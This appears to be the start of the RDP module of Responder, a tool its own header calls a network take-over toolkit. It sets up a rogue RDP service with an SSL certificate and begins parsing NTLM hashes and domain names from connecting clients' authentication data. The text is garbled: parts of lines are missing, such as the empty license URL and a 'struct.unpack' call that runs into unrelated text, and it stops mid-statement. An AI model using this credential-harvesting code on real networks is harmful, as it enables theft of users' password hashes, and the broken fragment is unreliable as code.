#!/usr/bin/env python # This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . from SocketServer import BaseRequestHandler from utils import * from packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer import struct import re import ssl cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert) key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey) def ParseNTLMHash(data,client, Challenge): #Parse NTLMSSP v1/v2 SSPIStart = data.find('NTLMSSP') SSPIString = data[SSPIStart:] LMhashLen = struct.unpack(' 60: NTLMHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() DomainLen = struct.unpack('